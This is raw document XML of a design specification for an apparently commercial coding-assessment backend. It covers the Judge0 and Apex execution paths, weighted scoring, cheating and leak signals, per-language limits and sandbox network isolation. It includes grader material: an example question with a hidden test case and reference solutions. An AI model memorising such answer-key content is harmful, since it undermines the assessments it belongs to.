        <w:t xml:space="preserve">     "started_at": "2026-05-03T10:14:45Z",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "submitted_at": "2026-05-03T10:15:00Z"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4. Enqueue job to Redis (BullMQ):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"job_id": "exec-uuid",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "response_id": "uuid",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "question_id": "qor-java-001",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "language": "java21",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "candidate_code": "&lt;code&gt;",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "test_cases": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       {"input": "...", "expected_output": "...", "weight": 0.33},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       {"input": "...", "expected_output": "...", "weight": 0.33},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       {"input": "...", "expected_output": "...", "weight": 0.34}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "time_limit_ms": 2000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "memory_limit_mb": 512,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "watermark_seed": "bosch_xyz" (if Stack-Vault, otherwise null)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5. Return to client immediately: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"response_id": "uuid",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "status": "submitted",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "estimated_wait_sec": 5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="orchestrator-execution"/>
      <w:r>
        <w:t xml:space="preserve">3.2 Orchestrator Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Dequeue job from Redis</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Route decision:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - If language = "apex" → Apex CLI path</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Else → Judge0 path</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Judge0 Path:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   a. Call Judge0 API POST /submissions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"source_code": "&lt;candidate code&gt;",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "language_id": &lt;lang_id&gt;,  # 62=java21, 71=python3, etc.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "stdin": "&lt;test case input&gt;",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "expected_output": "&lt;expected&gt;",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "cpu_time_limit": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "memory_limit": 512,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "wall_time_limit": 5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b. Poll submission status until completion (or timeout @ 30s wall time)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   c. Parse response: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"stdout": "&lt;actual output&gt;",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "stderr": "&lt;error output&gt;",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "exit_code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "status_id": 3,  # 3 = accepted, 4 = wrong answer, 5 = time limit, etc.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "compile_output": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "time": 0.234,  # seconds</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "memory": 45,   # MB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "message": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "error": null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d. Compare stdout against expected_output_pattern (regex or exact)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   e. Record test-pass/fail per test case</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Apex CLI Path:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   a. Enqueue to Apex queue (token bucket: 1 req/sec)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   b. Call Salesforce Platform CLI:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      sfdx force:apex:execute -f code_file.cls -u dev_org</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   c. Parse execution result (governor limit violations, errors, output)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   d. Record test-pass/fail per test case</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   e. On 1000th execution, rotate to fresh org (idempotent)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Scoring:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - For each test case: pass/fail based on output match or exception</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Score = sum(weight × is_pass) for all test cases</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - E.g., 3 tests (0.33 each): 2 pass = 0.66 = 66/100 score</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Capture execution_metadata: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"execution_millis": 234,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "memory_kb": 45120,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "test_results": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       {"test_index": 0, "passed": true, "stdout": "...", "stderr": ""},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       {"test_index": 1, "passed": true, "stdout": "...", "stderr": ""},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       {"test_index": 2, "passed": false, "stdout": "expected...", "stderr": "AssertionError"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "compilation_error": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "runtime_error": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "exit_code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "timeout": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "language": "java21"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7. Update content.responses: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"id": "uuid",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "score": 66.0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "time_taken_ms": 2100,  # submit → execute → record</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "execution_metadata": {&lt;above&gt;},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "suspicious_signals": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       "paste_vs_typed_ratio": 0.15,  # low = typed, high = pasted</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       "time_on_task": 125000,        # ms; if &lt; 1min = suspicious</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       "execution_success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       "language_mismatch": false     # e.g., Java code in Python question</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "status": "completed"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8. Anti-leak trigger (optional):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - If language=java &amp; question involves Kafka &amp; similar codebase found in GitHub public repos:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     Flag for anti-leak investigation (not auto-rotate; SME review)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Leverage watermark_seed data if Stack-Vault (encoded customer ID visible in variable names)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Return result to client:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   GET /api/v1/responses/{response_id}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"status": "completed",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "score": 66.0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "feedback": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       "test_0": "✓ Passed",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       "test_1": "✓ Passed",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       "test_2": "✗ Failed — expected 'foo', got 'bar'"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "execution_time_ms": 234,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "memory_used_kb": 45120</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  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st-case-schema-database"/>
      <w:r>
        <w:t xml:space="preserve">§ 4 Test-Case Schema (Database)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/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content.questions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sandbox_config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JSONB: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content.questions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sandbox_config JSONB;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Example value (for Java coding question):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"java21"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"memory_mb"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"time_ms"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"compilation_timeout_ms"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"test_cases"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"5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"expected_output_pattern"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"^8$"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regex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"Test case 1: sum of two numbers"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"-1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"expected_output_pattern"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"^0$"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"Test case 2: negative + positive"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"999 999"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"expected_output_pattern"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"^1998$"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"public"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Hidden from candidate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"Test case 3: large numbers"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"stdin"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For batch I/O questions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"starter_code"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"java"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"public class Solution {\n  public int solve(int a, int b) { ... }\n}"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"python"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"def solve(a, b): ..."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"reference_solution"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"java"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"public class Solution {\n  public int solve(int a, int b) { return a + b; }\n}"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"python"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"def solve(a, b): return a + b"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"rubric"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"correctness"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: {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"All test cases pass"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"efficiency"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: {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"O(1) time complexity"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"code_quality"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Other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"Clean, readable code"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a02c43ba72bc2d405ffe37294435e9ed21a7c81"/>
      <w:r>
        <w:t xml:space="preserve">§ 5 Per-Language Configuration (12 Languages Baseline)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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OpenJDK 21 (Temurin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compilation included; 3s compile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3,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Interpreter (no compilation overhead)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 LTS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3,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JavaScript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384 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Transpiled via tsx (requires compilation budget 1s)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C++</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">g++ -std=c++20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2,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compiled; 1s compile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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">384 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compiled; compilation expensive (2s budget)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3,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compiled; fast compilation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gcc -std=c17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2,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compiled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Postgres 16 (psql via Docker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Isolated DB per submission; no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128 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Shell script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Shell/AWK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bash + awk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">128 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2,000 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Text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Apex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Salesforce Platform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Via Apex CLI on developer org; governor limits apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Rationale: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Memory:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Generous defaults (256–512 MB) to avoid false failures; tightened per-question if needed.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Time:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Compilation-aware budgets. Rust &amp; TypeScript have longer budgets due to compiler overhead.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SQL:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Isolated PostgreSQL instance per submission (Docker sidecar); no inter-candidate data leakage.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ecurity-model"/>
      <w:r>
        <w:t xml:space="preserve">§ 6 Security Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="network-isolation"/>
      <w:r>
        <w:t xml:space="preserve">6.1 Network Isolation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Judge0 sandboxes run with Docker network driver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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">post-compilation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No outbound DNS, HTTP, or socket access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
